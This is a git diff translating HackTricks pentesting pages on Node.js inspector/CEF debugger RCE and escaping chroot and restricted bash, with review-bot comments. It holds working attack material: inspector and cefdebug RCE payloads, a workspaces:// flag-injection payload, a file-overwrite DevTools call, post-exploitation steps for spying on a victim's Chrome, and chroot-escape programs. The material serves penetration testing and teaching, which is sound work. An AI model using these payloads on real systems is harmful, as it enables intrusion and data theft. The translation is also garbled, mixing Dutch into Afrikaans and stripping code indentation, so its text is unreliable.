-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Basic Information +## Basiese Inligting -[From the docs](https://origin.nodejs.org/ru/docs/guides/debugging-getting-started): When started with the `--inspect` switch, a Node.js process listens for a debugging client. By **default**, it will listen at host and port **`127.0.0.1:9229`**. Each process is also assigned a **unique** **UUID**. +[Van die dokumentasie](https://origin.nodejs.org/ru/docs/guides/debugging-getting-started): Wanneer dit begin word met die `--inspect` skakelaar, luister 'n Node.js-proses vir 'n foutopsporingskliënt. Standaard sal dit luister by die gasheer en poort **`127.0.0.1:9229`**. Elke proses word ook toegewys 'n **unieke** **UUID**. -Inspector clients must know and specify host address, port, and UUID to connect. A full URL will look something like `ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e`. +Opsoekerskliënte moet die gasheeradres, poort en UUID ken en spesifiseer om te kan koppel. 'n Volledige URL sal iets lyk soos `ws://127.0.0.1:9229/0f2c936f-b1cd-4ac9-aab3-f63b0f33d55e`. {% hint style="warning" %} -Since the **debugger has full access to the Node.js execution environment**, a malicious actor able to connect to this port may be able to execute arbitrary code on behalf of the Node.js process (**potential privilege escalation**). +Aangesien die **foutopsporingsprogram volle toegang tot die Node.js-uitvoeringsomgewing het**, kan 'n kwaadwillige persoon wat in staat is om met hierdie poort te verbind, moontlik arbitrêre kode uitvoer namens die Node.js-proses (**potensiële bevoorregte eskalasie**). {% endhint %} -There are several ways to start an inspector: - +Daar is verskeie maniere om 'n opsoeker te begin: ```bash node --inspect app.js #Will run the inspector in port 9229 node --inspect=4444 app.js #Will run the inspector in port 4444 
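Review bot: `Opsoekerskliënte` and `'n opsoeker te begin` in this hunk translate "inspector" as if it meant a lookup tool ("opsoek" is "look up"); the same file uses `inspekteur` in the next hunk (`voorkom die uitbuiting van die inspekteur`, `### Inspekteur begin in lopende prosesse`), so use "inspekteur" here as well. The `+` side also drops the bold from `By **default**` (`Standaard sal dit luister ...`) and removes the blank line between `Daar is verskeie maniere om 'n opsoeker te begin:` and the ```bash fence; keep both as in the source.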
@@ -36,60 +35,50 @@ node --inspect-brk=0.0.0.0:4444 app.js #Will run the inspector all ifaces and po node --inspect --inspect-port=0 app.js #Will run the inspector in a random port # Note that using "--inspect-port" without "--inspect" or "--inspect-brk" won't run the inspector ``` - -When you start an inspected process something like this will appear: - +Wanneer jy 'n geïnspekteerde proses begin, sal iets soos hierdie verskyn: ``` Debugger ending on ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d For help, see: https://nodejs.org/en/docs/inspector ``` +Prosesse gebaseer op **CEF** (**Chromium Embedded Framework**) soos moet die parameter gebruik: `--remote-debugging-port=9222` om die **debugger** oop te maak (die SSRF-beskerming bly baie soortgelyk). In plaas daarvan om 'n **NodeJS** **debug**-sessie toe te staan, sal hulle kommunikeer met die blaaier deur die [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/), dit is 'n koppelvlak om die blaaier te beheer, maar daar is nie 'n direkte RCE nie. -Processes based on **CEF** (**Chromium Embedded Framework**) like need to use the param: `--remote-debugging-port=9222` to open de **debugger** (the SSRF protections remain very similar). However, they **instead** of granting a **NodeJS** **debug** session will communicate with the browser using the [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/), this is an interface to control the browser, but there isn't a direct RCE. - -When you start a debugged browser something like this will appear: - +Wanneer jy 'n gedebugde blaaier begin, sal iets soos hierdie verskyn: ``` DevTools listening on ws://127.0.0.1:9222/devtools/browser/7d7aa9d9-7c61-4114-b4c6-fcf5c35b4369 ``` +### Webblaaier, WebSockets en selfde-oorsprongbeleid -### Browsers, WebSockets and same-origin policy - -Websites open in a web-browser can make WebSocket and HTTP requests under the browser security model. 
An **initial HTTP connection** is necessary to **obtain a unique debugger session id**. The **same-origin-policy** **prevents** websites from being able to make **this HTTP connection**. For additional security against [**DNS rebinding attacks**](https://en.wikipedia.org/wiki/DNS\_rebinding)**,** Node.js verifies that the **'Host' headers** for the connection either specify an **IP address** or **`localhost`** or **`localhost6`** precisely. +Webwerwe wat in 'n webblaaier oopgemaak word, kan WebSocket- en HTTP-versoeke maak onder die webblaaier se veiligheidsmodel. 'n **Aanvanklike HTTP-verbinding** is nodig om 'n unieke aflyn-sessie-ID te verkry. Die **selfde-oorsprongbeleid** **voorkom** dat webwerwe in staat is om **hierdie HTTP-verbinding** te maak. Vir addisionele veiligheid teen [**DNS-herbindingsaanvalle**](https://en.wikipedia.org/wiki/DNS\_rebinding)**,** verifieer Node.js dat die **'Host'-koppe** vir die verbinding 'n **IP-adres** of **`localhost`** of **`localhost6`** spesifiek aandui. {% hint style="info" %} -This **security measures prevents exploiting the inspector** to run code by **just sending a HTTP request** (which could be done exploiting a SSRF vuln). +Hierdie **veiligheidsmaatreëls voorkom die uitbuiting van die inspekteur** om kode uit te voer deur **net 'n HTTP-versoek te stuur** (wat gedoen kon word deur 'n SSRF-fout uit te buit). {% endhint %} -### Starting inspector in running processes - -You can send the **signal SIGUSR1** to a running nodejs process to make it **start the inspector** in the default port. However, note that you need to have enough privileges, so this might grant you **privileged access to information inside the process** but no a direct privilege escalation. +### Inspekteur begin in lopende prosesse +Jy kan die **sein SIGUSR1** na 'n lopende Node.js-proses stuur om dit **die inspekteur te begin** op die verstekpoort. 
Let egter daarop dat jy genoeg voorregte moet hê, sodat dit jou moontlik **bevoorregte toegang tot inligting binne die proses** kan gee, maar nie 'n direkte bevoorregte verhoging nie. ```bash kill -s SIGUSR1 # After an URL to access the debugger will appear. e.g. ws://127.0.0.1:9229/45ea962a-29dd-4cdd-be08-a6827840553d ``` - {% hint style="info" %} -This is useful in containers because **shutting down the process and starting a new one** with `--inspect` is **not an option** because the **container** will be **killed** with the process. +Dit is nuttig in houers omdat die proses afgeskakel en 'n nuwe een begin met `--inspect` nie 'n opsie is nie omdat die houer met die proses doodgemaak sal word. {% endhint %} -### Connect to inspector/debugger +### Koppel aan inspekteur/debugeerder -To connect to a **Chromium-based browser**, the `chrome://inspect` or `edge://inspect` URLs can be accessed for Chrome or Edge, respectively. By clicking the Configure button, it should be ensured that the **target host and port** are correctly listed. The image shows a Remote Code Execution (RCE) example: +Om aan te sluit by 'n Chromium-gebaseerde webblaaier, kan die `chrome://inspect` of `edge://inspect` URL's gebruik word vir Chrome of Edge onderskeidelik. Deur op die Configureer-knoppie te klik, moet verseker word dat die teiken gasheer en poort korrek gelys is. Die prent wys 'n voorbeeld van 'n Remote Code Execution (RCE): ![](<../../.gitbook/assets/image (620) (1).png>) -Using the **command line** you can connect to a debugger/inspector with: - +Met die **opdraglyn** kan jy koppel aan 'n debugeerder/inspekteur met: ```bash node inspect : node inspect 127.0.0.1:9229 # RCE example from debug console debug> exec("process.mainModule.require('child_process').exec('/Applications/iTerm.app/Contents/MacOS/iTerm2')") ``` - -The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug), allows to **find inspectors** running locally and **inject code** into them. 
- +Die instrument [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefdebug), maak dit moontlik om **inspekteerders** wat plaaslik loop te **vind** en **kode in te spuit** in hulle. ```bash #List possible vulnerable sockets ./cefdebug.exe 
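Review bot: two wording problems in the added prose of the `@@ -36,60` hunk. `'n unieke aflyn-sessie-ID` renders "a unique debugger session id" with "aflyn" (offline); it should read "'n unieke debugger-sessie-ID". And `Prosesse gebaseer op **CEF** (**Chromium Embedded Framework**) soos moet die parameter gebruik:` reproduces the source's dangling "like need to", leaving "soos" without an object; either drop "soos" or complete the comparison. The untouched context line `Debugger ending on ws://127.0.0.1:9229/...` is a typo for "Debugger listening on" in the English source and deserves a separate fix upstream rather than in this translation commit.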
@@ -98,76 +87,67 @@ The tool [**https://github.com/taviso/cefdebug**](https://github.com/taviso/cefd #Exploit it ./cefdebug.exe --url ws://127.0.0.1:3585/5a9e3209-3983-41fa-b0ab-e739afc8628a --code "process.mainModule.require('child_process').exec('calc')" ``` - {% hint style="info" %} -Note that **NodeJS RCE exploits won't work** if connected to a browser via [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) (you need to check the API to find interesting things to do with it). +Let daarop dat **NodeJS RCE-aanvalle nie sal werk** as jy verbind is met 'n webblaaier via [**Chrome DevTools Protocol**](https://chromedevtools.github.io/devtools-protocol/) (jy moet die API nagaan om interessante dinge daarmee te doen). {% endhint %} ## RCE in NodeJS Debugger/Inspector {% hint style="info" %} -If you came here looking how to get [**RCE from a XSS in Electron please check this page.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/) +As jy hier gekom het om uit te vind hoe om [**RCE te kry vanaf 'n XSS in Electron, kyk asseblief hierdie bladsy.**](../../network-services-pentesting/pentesting-web/electron-desktop-apps/) {% endhint %} -Some common ways to obtain **RCE** when you can **connect** to a Node **inspector** is using something like (looks that this **won't work in a connection to Chrome DevTools protocol**): - +Sommige algemene maniere om **RCE** te verkry wanneer jy kan **verbind** met 'n Node **inspekteur** is om iets soos die volgende te gebruik (lyk dit sal nie werk in 'n verbinding met die Chrome DevTools-protokol nie): ```javascript process.mainModule.require('child_process').exec('calc') window.appshell.app.openURLInDefaultBrowser("c:/windows/system32/calc.exe") require('child_process').spawnSync('calc.exe') Browser.open(JSON.stringify({url: "c:\\windows\\system32\\calc.exe"})) ``` +## Chrome DevTools-protokol-pakette -## Chrome DevTools Protocol Payloads +Jy kan die API hier nagaan: 
[https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)\ +In hierdie gedeelte sal ek net interessante dinge lys wat mense gebruik het om hierdie protokol uit te buit. -You can check the API here: [https://chromedevtools.github.io/devtools-protocol/](https://chromedevtools.github.io/devtools-protocol/)\ -In this section I will just list interesting things I find people have used to exploit this protocol. +### Parameterinspuiting via diep skakels -### Parameter Injection via Deep Links +In die [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) het Rhino Security ontdek dat 'n toepassing gebaseer op CEF 'n aangepaste URI in die stelsel geregistreer het (workspaces://) wat die volledige URI ontvang en dan die CEF-gebaseerde toepassing met 'n konfigurasie wat gedeeltelik uit daardie URI saamgestel is, **geaktiveer** het. -In the [**CVE-2021-38112**](https://rhinosecuritylabs.com/aws/cve-2021-38112-aws-workspaces-rce/) Rhino security discovered that an application based on CEF **registered a custom UR**I in the system (workspaces://) that received the full URI and then **launched the CEF based applicatio**n with a configuration that was partially constructing from that URI. - -It was discovered that the URI parameters where URL decoded and used to launch the CEF basic application, allowing a user to **inject** the flag **`--gpu-launcher`** in the **command line** and execute arbitrary things. - -So, a payload like: +Daar is ontdek dat die URI-parameters URL-dekodeer is en gebruik is om die CEF-basis-toepassing te aktiveer, wat 'n gebruiker in staat stel om die vlag **`--gpu-launcher`** in die **opdraglyn** in te spuit en arbitrêre dinge uit te voer. +So, 'n payload soos: ``` workspaces://anything%20--gpu-launcher=%22calc.exe%22@REGISTRATION_CODE ``` +Sal voer 'n calc.exe uit. -Will execute a calc.exe. 
- -### Overwrite Files - -Change the folder where **downloaded files are going to be saved** and download a file to **overwrite** frequently used **source code** of the application with your **malicious code**. +### Oorskryf Lêers +Verander die vouer waar **afgelaaide lêers gestoor gaan word** en laai 'n lêer af om die gereeld gebruikte **bronkode** van die toepassing met jou **skadelike kode** te **oorskryf**. ```javascript ws = new WebSocket(url); //URL of the chrome devtools service ws.send(JSON.stringify({ - id: 42069, - method: 'Browser.setDownloadBehavior', - params: { - behavior: 'allow', - downloadPath: '/code/' - } +id: 42069, +method: 'Browser.setDownloadBehavior', +params: { +behavior: 'allow', +downloadPath: '/code/' +} })); ``` +### Webdriver RCE en eksfiltrering -### Webdriver RCE and exfiltration - -According to this post: [https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148](https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148) it's possible to obtain RCE and exfiltrate internal pages from theriver. +Volgens hierdie pos: [https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148](https://medium.com/@knownsec404team/counter-webdriver-from-bot-to-rce-b5bfb309d148) is dit moontlik om RCE te verkry en interne bladsye uit te eksfiltreer vanaf theriver. ### Post-Exploitation -In a real environment and **after compromising** a user PC that uses Chrome/Chromium based browser you could launch a Chrome process with the **debugging activated and port-forward the debugging port** so you can access it. This way you will be able to **inspect everything the victim does with Chrome and steal sensitive information**. 
- -The stealth way is to **terminate every Chrome process** and then call something like +In 'n werklike omgewing en **nadat 'n gebruiker se rekenaar wat Chrome/Chromium-gebaseerde blaaier gebruik, gekompromitteer is**, kan jy 'n Chrome-proses begin met die **aktivering van foutopsporing en die deurstuur van die foutopsporingspoort**, sodat jy daarby kan kom. Op hierdie manier sal jy in staat wees om **alles wat die slagoffer met Chrome doen te ondersoek en sensitiewe inligting te steel**. +Die sluipende manier is om **elke Chrome-proses te beëindig** en dan iets soos te roep ```bash Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session" ``` - -## References +## Verwysings * [https://www.youtube.com/watch?v=iwR746pfTEc\&t=6345s](https://www.youtube.com/watch?v=iwR746pfTEc\&t=6345s) * [https://github.com/taviso/cefdebug](https://github.com/taviso/cefdebug) @@ -182,14 +162,14 @@ Start-Process "Chrome" "--remote-debugging-port=9222 --restore-last-session"
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
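Review bot: in the `@@ -98,76` hunk the heading `## Chrome DevTools-protokol-pakette` mistranslates "Payloads" as "pakette" (packages) while the body keeps the English word (`So, 'n payload soos:`); use "payloads" in the heading as well. `Sal voer 'n calc.exe uit.` has the wrong word order for a separable verb and should be "Sal 'n calc.exe uitvoer." In the Webdriver section `eksfiltrering` is not an Afrikaans word (use "eksfiltrasie") and the source typo `theriver` is carried over unchanged. Finally, the `Browser.setDownloadBehavior` JSON block loses its indentation (`id: 42069,` and the `params` object are flushed left); it still parses, but code fences should pass through translation untouched, and the same stripping breaks the Python snippet in escaping-from-limited-bash.md in this PR.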
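Review bot: the footer in the `@@ -182,14` hunk is rendered differently from the header of the same file: `Deel jou hacking-truuks` here versus `Deel jou hacktruuks` at the top, and the other files in this PR use `hacktruuks` too. Pick one form and use it in every header and footer, otherwise a later find-and-replace of the boilerplate will miss half of the pages.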
diff --git a/linux-hardening/privilege-escalation/escaping-from-limited-bash.md b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md index f09a01b29..5d2d17db2 100644 --- a/linux-hardening/privilege-escalation/escaping-from-limited-bash.md +++ b/linux-hardening/privilege-escalation/escaping-from-limited-bash.md @@ -1,46 +1,45 @@ -# Escaping from Jails +# Ontsnapping uit Gevangenisse
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking vanaf nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Andere manieren om HackTricks te ondersteunen: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Als je je **bedrijf wilt adverteren in HackTricks** of **HackTricks wilt downloaden in PDF**, bekijk dan de [**ABONNEMENTSPAKKETTEN**](https://github.com/sponsors/carlospolop)! +* Koop de [**officiële PEASS & HackTricks-merchandise**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), onze collectie exclusieve [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit je aan bij de** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of de [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Deel je hacktrucs door PR's in te dienen bij de** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
## **GTFOBins** -**Search in** [**https://gtfobins.github.io/**](https://gtfobins.github.io) **if you can execute any binary with "Shell" property** +**Zoek in** [**https://gtfobins.github.io/**](https://gtfobins.github.io) **of je een binair bestand kunt uitvoeren met de eigenschap "Shell"** -## Chroot Escapes +## Ontsnapping uit Chroot -From [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations): The chroot mechanism is **not intended to defend** against intentional tampering by **privileged** (**root**) **users**. On most systems, chroot contexts do not stack properly and chrooted programs **with sufficient privileges may perform a second chroot to break out**.\ -Usually this means that to escape you need to be root inside the chroot. +Van [wikipedia](https://en.wikipedia.org/wiki/Chroot#Limitations): Het chroot-mechanisme is **niet bedoeld** om te beschermen tegen opzettelijke manipulatie door **bevoorrechte** (**root**) **gebruikers**. Op de meeste systemen worden chroot-contexten niet correct gestapeld en kunnen gechroote programma's **met voldoende privileges een tweede chroot uitvoeren om te ontsnappen**.\ +Meestal betekent dit dat je root moet zijn binnen de chroot om te ontsnappen. {% hint style="success" %} -The **tool** [**chw00t**](https://github.com/earthquake/chw00t) was created to abuse the following escenarios and scape from `chroot`. +De **tool** [**chw00t**](https://github.com/earthquake/chw00t) is gemaakt om misbruik te maken van de volgende scenario's en te ontsnappen uit `chroot`. {% endhint %} ### Root + CWD {% hint style="warning" %} -If you are **root** inside a chroot you **can escape** creating **another chroot**. This because 2 chroots cannot coexists (in Linux), so if you create a folder and then **create a new chroot** on that new folder being **you outside of it**, you will now be **outside of the new chroot** and therefore you will be in the FS. 
+Als je **root** bent binnen een chroot, kun je ontsnappen door een **andere chroot** te maken. Dit komt doordat 2 chroots niet naast elkaar kunnen bestaan (in Linux), dus als je een map maakt en vervolgens een **nieuwe chroot** maakt in die nieuwe map terwijl je **buiten de chroot** bent, bevind je je nu **buiten de nieuwe chroot** en ben je dus in het bestandssysteem. -This occurs because usually chroot DOESN'T move your working directory to the indicated one, so you can create a chroot but e outside of it. +Dit gebeurt omdat chroot meestal je werkmap niet verplaatst naar de aangegeven map, dus je kunt een chroot maken maar er buiten blijven. {% endhint %} -Usually you won't find the `chroot` binary inside a chroot jail, but you **could compile, upload and execute** a binary: +Meestal vind je het `chroot`-binair bestand niet binnen een chroot-gevangenis, maar je **kunt een binair bestand compileren, uploaden en uitvoeren**:
C: break_chroot.c - ```c #include #include @@ -50,62 +49,56 @@ Usually you won't find the `chroot` binary inside a chroot jail, but you **could int main(void) { - mkdir("chroot-dir", 0755); - chroot("chroot-dir"); - for(int i = 0; i < 1000; i++) { - chdir(".."); - } - chroot("."); - system("/bin/bash"); +mkdir("chroot-dir", 0755); +chroot("chroot-dir"); +for(int i = 0; i < 1000; i++) { +chdir(".."); +} +chroot("."); +system("/bin/bash"); } ``` -
Python - ```python #!/usr/bin/python import os os.mkdir("chroot-dir") os.chroot("chroot-dir") for i in range(1000): - os.chdir("..") +os.chdir("..") os.chroot(".") os.system("/bin/bash") ``` -
Perl - ```perl #!/usr/bin/perl mkdir "chroot-dir"; chroot "chroot-dir"; foreach my $i (0..1000) { - chdir ".." +chdir ".." } chroot "."; system("/bin/bash"); ``` -
-### Root + Saved fd +### Root + Opgeslagen fd {% hint style="warning" %} -This is similar to the previous case, but in this case the **attacker stores a file descriptor to the current directory** and then **creates the chroot in a new folder**. Finally, as he has **access** to that **FD** **outside** of the chroot, he access it and he **escapes**. +Dit is soortgelyk aan die vorige geval, maar in hierdie geval **stoor die aanvaller 'n lêerbeskrywer na die huidige gids** en skep dan die chroot in 'n nuwe gids. Uiteindelik, omdat hy **toegang** het tot daardie **FD buite** die chroot, het hy toegang daartoe en **ontsnap** hy. {% endhint %}
C: break_chroot.c - ```c #include #include @@ -115,71 +108,69 @@ This is similar to the previous case, but in this case the **attacker stores a f int main(void) { - mkdir("tmpdir", 0755); - dir_fd = open(".", O_RDONLY); - if(chroot("tmpdir")){ - perror("chroot"); - } - fchdir(dir_fd); - close(dir_fd); - for(x = 0; x < 1000; x++) chdir(".."); - chroot("."); +mkdir("tmpdir", 0755); +dir_fd = open(".", O_RDONLY); +if(chroot("tmpdir")){ +perror("chroot"); +} +fchdir(dir_fd); +close(dir_fd); +for(x = 0; x < 1000; x++) chdir(".."); +chroot("."); } ``` -
### Root + Fork + UDS (Unix Domain Sockets) {% hint style="warning" %} -FD can be passed over Unix Domain Sockets, so: +FD kan oorgedra word oor Unix Domain Sockets, so: -* Create a child process (fork) -* Create UDS so parent and child can talk -* Run chroot in child process in a different folder -* In parent proc, create a FD of a folder that is outside of new child proc chroot -* Pass to child procc that FD using the UDS -* Child process chdir to that FD, and because it's ouside of its chroot, he will escape the jail +* Skep 'n kinderproses (fork) +* Skep UDS sodat ouer en kind kan kommunikeer +* Voer chroot uit in kinderproses in 'n ander vouer +* In ouer proses, skep 'n FD van 'n vouer wat buite die nuwe kinderproses se chroot is +* Gee daardie FD aan die kinderproses deur die UDS te gebruik +* Kindproses chdir na daardie FD, en omdat dit buite sy chroot is, sal hy die tronk ontsnap {% endhint %} ### Root + Mount {% hint style="warning" %} -* Mounting root device (/) into a directory inside the chroot -* Chrooting into that directory +* Monteer die roetetoestel (/) in 'n gids binne die chroot +* Chroot in daardie gids -This is possible in Linux +Dit is moontlik in Linux {% endhint %} ### Root + /proc {% hint style="warning" %} -* Mount procfs into a directory inside the chroot (if it isn't yet) -* Look for a pid that has a different root/cwd entry, like: /proc/1/root -* Chroot into that entry +* Monteer procfs in 'n gids binne die chroot (as dit nog nie is nie) +* Soek na 'n pid wat 'n verskillende roet/cwd inskrywing het, soos: /proc/1/root +* Chroot in daardie inskrywing {% endhint %} ### Root(?) 
+ Fork {% hint style="warning" %} -* Create a Fork (child proc) and chroot into a different folder deeper in the FS and CD on it -* From the parent process, move the folder where the child process is in a folder previous to the chroot of the children -* This children process will find himself outside of the chroot +* Skep 'n Fork (kinderproses) en chroot in 'n ander vouer dieper in die FS en CD daarop +* Vanuit die ouerproses, skuif die vouer waar die kinderproses in is na 'n vouer voor die chroot van die kinders +* Hierdie kinderproses sal homself buite die chroot vind {% endhint %} ### ptrace {% hint style="warning" %} -* Time ago users could debug its own processes from a process of itself... but this is not possible by default anymore -* Anyway, if it's possible, you could ptrace into a process and execute a shellcode inside of it ([see this example](linux-capabilities.md#cap\_sys\_ptrace)). +* 'n Tyd gelede kon gebruikers hul eie prosesse vanuit 'n proses van hulself afkamp... maar dit is nie meer standaard moontlik nie +* In elk geval, as dit moontlik is, kan jy ptrace in 'n proses doen en 'n shellcode daarin uitvoer ([sien hierdie voorbeeld](linux-capabilities.md#cap\_sys\_ptrace)). {% endhint %} -## Bash Jails +## Bash Tronke -### Enumeration - -Get info about the jail: +### Opname +Kry inligting oor die tronk: ```bash echo $SHELL echo $PATH 
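Review bot: the opening hunk of escaping-from-limited-bash.md is Dutch, not Afrikaans, although the commit says "Translated to Afrikaans": `Andere manieren om HackTricks te ondersteunen:`, `Als je je **bedrijf wilt adverteren in HackTricks**` and `Het chroot-mechanisme is **niet bedoeld** om te beschermen` all use Dutch vocabulary and orthography, and the file only switches to Afrikaans at `### Root + Opgeslagen fd`. Re-translate everything above that heading so the page is in one language, and add a language check to the workflow so mixed output is rejected before a PR is opened.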
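Review bot: the whitespace stripping in the `@@ -50,62` hunk breaks the Python variant of the chroot escape: `for i in range(1000):` is now followed by an unindented `+os.chdir("..")`, which raises IndentationError, so the script no longer runs at all. The C and Perl variants (and the C code in the `@@ -115,71` hunk) lose only readability, but the remedy is the same: restore the original indentation and exclude fenced code blocks from whatever trimming the translation step applies.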
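Review bot: several technical terms in the Root + Mount, Root + /proc and ptrace bullets of the `@@ -115,71` hunk are mistranslated. `Monteer die roetetoestel (/)` renders "root device" with "roete" (route), `'n verskillende roet/cwd inskrywing` uses "roet" (soot), and `hul eie prosesse vanuit 'n proses van hulself afkamp` does not mean "debug". Use "root-toestel", "root/cwd" and "debug" (or "ontfout"); "root" is a proper term here and is already left untranslated in the same hunk's headings (`### Root + Mount`).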
@@ -187,105 +178,101 @@ env export pwd ``` +### Wysig PATH -### Modify PATH - -Check if you can modify the PATH env variable - +Kyk of jy die PATH-omgewingsveranderlike kan wysig. ```bash echo $PATH #See the path of the executables that you can use PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin #Try to change the path echo /home/* #List directory ``` +### Gebruik van vim -### Using vim +Vim is 'n kragtige teksredigeerder wat gebruik kan word om lêers te wysig en te skep. Dit kan ook gebruik word as 'n hulpmiddel vir priviligie-escalasie in 'n beperkte bash-omgewing. +Om vim te gebruik, voer die volgende opdrag in die beperkte bash-omgewing in: + +```bash +vim +``` + +Dit sal vim in die beperkte omgewing aktiveer. Jy kan dan die volgende stappe volg om priviligie-escalasie te probeer: + +1. Druk die `Esc`-sleutel om in die bevelsmodus te gaan. +2. Tik `:set shell=/bin/bash` en druk `Enter` om die skulprigting van die shell te verander na die volledige bash-omgewing. +3. Tik `:shell` en druk `Enter` om 'n nuwe bash-sessie te begin met volle toegang. + +Hierdie tegniek kan gebruik word om beperkte bash-omgewings te ontsnap en toegang te verkry tot volle beheer oor die stelsel. 
